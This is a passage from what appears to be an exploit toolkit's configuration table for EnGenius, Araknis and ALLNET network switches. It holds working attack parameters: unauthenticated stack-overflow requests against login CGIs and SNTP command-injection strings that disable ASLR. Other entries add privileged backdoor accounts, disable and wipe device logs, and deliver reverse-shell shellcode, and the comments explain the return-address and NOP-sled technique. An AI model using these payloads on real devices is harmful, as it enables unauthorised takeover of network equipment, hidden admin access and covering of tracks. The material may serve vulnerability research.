'workaround':False,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
}, 
#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True, # False = use Heap, and there are no ASLR
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},

},
},

'EnGenius': { 
'vendor': 'EnGenius Technologies, Inc.',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
# Verify lacking authentication
'verify': { 
'security.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,# <================================
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
# Bonus: Disable and clean logs
#
#
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,

'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True

},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'log_settings_set_cmd':'&en=0',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'&ta=0',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'&ta=1',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',

'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',# CMD

'sys_timeSettings_set_cmd_enable':'&sn=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sn=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
}, 
#
# Used for both 'heap' and 'stack'
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
#'stack':False, # False = use Heap, and there are no ASLR
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},

},
},

'Araknis': { 
'vendor': 'Araknis Networks',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
# Verify lacking authentication
'verify': { 
'security.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,# <================================
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False, # It is vulnerable, but I am not using this authenticated code here :>
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,

'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True

},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'log_settings_set_cmd':'&en=0',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'&ta=0',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'&ta=1',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',

'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',

'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',# CMD

'sys_timeSettings_set_cmd_enable':'&sn=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sn=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
}, 
#
# Used for both 'heap' and 'stack'
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'stack':False, # False = use Heap, and there are no ASLR
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},

},
},

'ALLNET_JSON': { 
'vendor': 'ALLNET GmbH Computersysteme',
'model':'ALL-SG82xx',
'uri':'https://www.allnet.de/',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': { 
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {# Not vulnerable 
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',

#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',# Enable Logging CMD
'log_settings_set_cmd':'&empty=1',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'&target=0',# Clean RAM CMD
'log_ramClear_SIGSEGV':True,# Clean RAM SIGSEGV ?

'log_fileClear_cmd':'&target=1',# Clean FILE log CMD
'log_fileClear_SIGSEGV':True,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',

'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',# CMD

'sys_timeSettings_set_cmd_enable':'&sntp=1',# Enable CMD
'sys_timeSettings_set_cmd_disable':'&sntp=0',# Disable CMD
'sys_timeSettings_set_SIGSEGV': True,# SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': False,
#'vulnerable': True,
'safe': True
}, 
#
# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
#
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True, # False = use Heap, and there are no ASLR
'workaround':False,# My LAB workaround
'vulnerable': True,
'safe': True
},

},
},

'ALLNET': {
'vendor': 'ALLNET GmbH Computersysteme',
'uri':'https://www.allnet.de/',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
# Verify lacking authentication
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!', # one 0x20 in beginning
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': { # 'username' also suffer from stack overflow
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'httpuploadfirmware.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadfirmware.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'httpupload_runstart_cfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/tmp/startup-config',
'content_check':'/tmp/startup-config',
'vulnerable': True,
'safe': True
},
'version_upgrade.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
'uri':'/cgi-bin/version_upgrade.cgi',
'check_uri':'',
'content':'Firm Upgrade',
'content_check':'Firm Upgrade',
'vulnerable': True,
'safe': True
},
'factory_reset.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Reset device to factory default (PoC: Too dangerous to verify)',
'uri':'/cgi-bin/factory_reset.cgi',
'check_uri':'',
'content':'Too dangerous to verify',
'content_check':'dummy',
'vulnerable': True,
'safe': False
},
'sysinfo_config.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':False,
'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
'uri':'/cgi-bin/sysinfo_config.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'"/cgi-bin/change_mac_addr_set',
'vulnerable': True,
'safe': True
},
'change_mac_addr_set.cgi': {
'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/change_mac_addr_set.cgi',
'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},

},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
'vulnerable': True,
'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'', 
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
}, 
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'cmd=547',
'inject_uri':'/cgi-bin/dispatcher.cgi',

'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',

'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},

#
# The stack overflow in 'username' and 'password' at same request are multipurpose.
#

#
# The trick to jump and execute:
# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
# 4. We will also feed required function parameters, by adding them to '_CMD_'
#
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',

'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
'log_settings_set_SIGSEGV':True,# Disable Logging SIGSEGV ?

'log_ramClear_cmd':'',# Clean RAM log CMD
'log_ramClear_SIGSEGV':False,# Clean RAM log SIGSEGV ?

'log_fileClear_cmd':'',# Clean FILE log CMD
'log_fileClear_SIGSEGV':False,# Clean FILE log SIGSEGV ?

'workaround':False,# My LAB workaround
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
